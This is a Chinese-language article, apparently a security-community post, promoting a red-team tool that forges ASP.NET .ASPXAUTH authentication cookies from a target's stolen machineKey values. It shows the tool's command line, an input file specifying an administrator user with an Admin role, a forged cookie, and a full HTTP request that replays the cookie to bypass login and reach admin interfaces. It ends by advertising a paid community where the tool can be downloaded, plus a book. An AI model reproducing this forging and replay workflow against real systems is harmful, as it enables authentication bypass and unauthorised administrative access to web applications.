绕过 .NET 身份认证，自动化伪造.ASPXAUTH Cookie票据

在对 .NET Web 应用的红队攻防中，身份认证机制的突破是横向渗透的关键节点。不同于传统的会话劫持，通过直接伪造 .ASPXAUTH Cookie 可绕过服务器内存校验，实现无交互式登录态生成，本文将深度揭秘一款专为红队设计的工具——Sharp4ASPXCookieEncrypt.exe。

01. 工具背景介绍

在 .NET 的 FormsAuthentication 认证流程中，用户登录成功后，服务器会生成一个 FormsAuthenticationTicket 对象，红队若想伪造有效票据，需解决以下问题：

密钥获取
必须获取目标的 DecryptionKey 和 ValidationKey（通常存储在 web.config 或 machine.config 中）。
算法匹配
需确认目标使用的加密算法（AES/DES/3DES）和签名算法（SHA1/HMACSHA256）。
票据格式
生成的票据必须严格符合 .NET 的解析规范，否则会被服务器丢弃。

Sharp4ASPXCookieEncrypt.exe 的解决方案：

支持从配置文件动态读取密钥和算法参数。
内置 .NET 票据生成逻辑，确保输出格式与原生票据完全一致。
提供算法枚举功能，可测试不同算法组合的兼容性。

02. 工具基本介绍

Sharp4ASPXCookieEncrypt.exe，该工具通过逆向分析 .NET 票据加密逻辑，结合目标系统的 machineKey 配置，实现身份票据的自动化伪造，为绕过安全认证提供核心支持。

03. 工具实战用法

工具有以下特性：纯.NET Framework 编写，支持 Windows 控制台运行；一键解析，快速输出伪造后的票据信息，基本用法如下所示。

Sharp4ASPXCookieEncrypt.exe "1.txt"

参数指定的 1.txt 文件，包含了如下的关键信息：

DecryptionKey: 56AB7132...17DecryptionAlgo:AESValidationKey: A69D80B9...8DC  ValidationAlgo:SHA1Username:administratorExpireMinutes:1440UserData: Role=Admin|IP=192.168.1.1

可自定义用户名、过期时间、用户数据（如角色、IP 等），覆盖业务逻辑校验，运行后的伪造的 Cookies 如下所示。

输出的结果中得到伪造的 ASPXAUTH Cookies：CA387A93AD4214F356ED05C26C1E4D80F0804CD526766778B62D4F9213B87B5369755F95008A34644B9CA6B7646E191958A1AE14DB398AB943D3DB042EDA06EC3CBE89F3EAC1402A04DCF1C0D9430E3E8832C5089B0DCB89FB9B9923D53AECFFDA724AC150904B141F78F9389DA360BCBFACD85283A53484D031475643DA18FDC0F4F55D74DD4F07190D08D4E4F6AB48CF90D57E

将输出值带入浏览器或请求头，即可直接绕过认证，访问目标系统的管理接口，如下所示。

POST /login.aspx?Url=Index.aspx HTTP/1.1Content-Length:9491Cache-Control: max-age=0Upgrade-Insecure-Requests:1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML,like Gecko)Accept: text/html,application/xhtml+xml,application/xml;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:.ASPXAUTH=CA387A93AD4214F356ED05C26C1E4D80F0804CD526766778B62D4F9213B87B5369755F95008A34644B9CA6B7646E191958A1AE14DB398AB943D3DB042EDA06EC3CBE89F3EAC1402A04DCF1C0D9430E3E8832C5089B0DCB89FB9B9923D53AECFFDA724AC150904B141F78F9389DA360BCBFACD85283A53484D031475643DA18FDC0F4F55D74DD4F07190D08D4E4F6AB48CF90D57EConnection: close

综上，.ASPXAUTH 是 ASP.NET 最常见的身份令牌之一，一旦被伪造利用，便意味着完整的登录状态被复制。Sharp4ASPXCookieEncrypt.exe 工具让这一过程自动化、实战化、无交互，成为红队认证绕过的有力工具。文章涉及的工具已打包在星球，感兴趣的朋友可以加入自取。

04.NET安全扩展学习

以上相关的知识点已收录于新书《.NET安全攻防指南》，全书共计25章，总计1010页，分为上下册，横跨.NET Web代码审计与红队渗透两大领域。

上册深入剖析.NET Web安全审计的核心技术，帮助读者掌握漏洞发现与修复的精髓；下册则聚焦于.NET逆向工程与攻防对抗的实战技巧，揭秘最新的对抗策略与技术方法。

05. 技术精华内容

从漏洞分析到安全攻防，我们涵盖了 .NET 安全各个关键方面，为您呈现最新、最全面的 .NET 安全知识，下面是公众号发布的精华文章集合，推荐大伙阅读！

06. 加入安全社区

目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最专业的技术知识库之一，超 1200+ 成员一起互动学习。星球主题数量近 600+，精华主题 230+，PDF文档和压缩包 300+ 。从Web应用到PC端软件应用，无论您是初学者还是经验丰富的开发人员，都能在这里找到对应的实战指南和最佳实践。